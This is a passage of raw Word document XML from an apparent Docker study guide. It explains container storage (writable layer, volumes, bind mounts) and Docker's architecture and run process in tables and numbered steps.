          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, it is stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>container’s writable layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Union File System</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used by Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AD961A" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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8D71922">
          <v:rect id="_x0000_i3382" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C64423A"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Storage Breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4DA2A9"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By default</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7665DCF9" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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 xml:space="preserve">Objects (e.g., files, logs) are stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>container's writable layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDB2369" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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 xml:space="preserve">This is </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ephemeral</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>—i.e., if the container is deleted, the data is lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEA3CCD"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If a volume is mounted</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2B4D27" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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 xml:space="preserve">If you're using a volume (-v volume-name:/path), the object is stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>volume on the host</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (typically under /var/lib/docker/volumes/).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3BB25A" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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 xml:space="preserve">This makes the data </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>persistent</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across container restarts/deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1335F0BA"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If a bind mount is used</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1760D4BB" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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 xml:space="preserve">With a bind mount (-v /host/path:/container/path), the data is written </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>directly to the host filesystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CDD682" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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EEBF37D">
          <v:rect id="_x0000_i3383" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAB2B7F"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">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9"/>
        <w:gridCol w:w="3521"/>
      </w:tblGrid>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="5BE16EEC" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40B05AC3"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Theme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4896CA73"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Theme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Where the object is stored</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="47ADAA3D" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72694912"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No volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C25229C"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Container's writable layer (ephemeral)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="2103550A" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C68D1C1"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Docker volume used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C43D306"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Docker-managed volume on the host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="314DF609" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17E21B87"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Bind mount used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5846DB0A"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Host file system (path you mounted)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="476B29E1" w14:textId="254510B0" w:rsidR="00145166" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0014516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1C3F2C4">
          <v:rect id="_x0000_i3384" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B455462" w14:textId="15582AB6" w:rsidR="00613601" w:rsidRPr="00CE4B95" w:rsidRDefault="00A504FE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="839" w:name="_Toc196308319"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the process of Docker</w:t>
      </w:r>
      <w:r w:rsidR="00613601" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="839"/>
    </w:p>
    <w:p w14:paraId="5688C4F5" w14:textId="5C4DD00D" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker process</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to how Docker works internally to build, run, and manage containers. Here's a simplified breakdown of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker lifecycle and architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F8C1C5" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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6847378">
          <v:rect id="_x0000_i3385" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2E8971"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Docker Architecture Compon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16"/>
        <w:gridCol w:w="7788"/>
      </w:tblGrid>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="40DD6CFD" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D5B9CF2"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Theme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EA0FB82"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Theme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="57E0997B" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09AAF9AF"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Docker Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F3964E5"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CLI tool (docker) that users interact with. Sends commands to the Docker daemon.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="10A08E56" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E6CD9ED"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Docker Daemon</w:t>
            </w:r>
            <w:r w:rsidRPr="00127EBD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (dockerd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10F13590"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Runs in the background and handles building, running, and managing Docker containers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="3EBAE6A0" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A81357B"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Docker Images</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49EDB162"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Read-only templates used to create containers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="5AE25F9A" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="232E62CA"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Docker Containers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4590B0FB"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Runnable instances of Docker images.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127EBD" w:rsidRPr="00127EBD" w14:paraId="6884EAA4" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="397A8FA8"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Docker Registries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DE5EB69"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Repositories like Docker Hub to store and share images.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E2A8B11" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00000000" w:rsidP="00127E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424E8BE0">
          <v:rect id="_x0000_i3386" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5125DDD2"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Docker Process Flow (Step-by-Step)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BBA88B"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>User Issues a Docker Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3D9B83" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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E.g., docker run nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C83C137"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker Client Sends Command to Docker Daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25981F8B" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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The CLI (docker) talks to the Docker daemon (dockerd) using REST API over Unix socket or TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FED2B0"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker Daemon Checks Image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E596CE" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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If the image is not available locally, it pulls it from Docker Hub (or other registry).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D75A1E"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Container Creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A8FF59" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Docker unpacks the image layers and creates a container (with its own file system and isolated environment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5958D9FD"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Container Start</w:t>
      </w:r>
    </w:p>
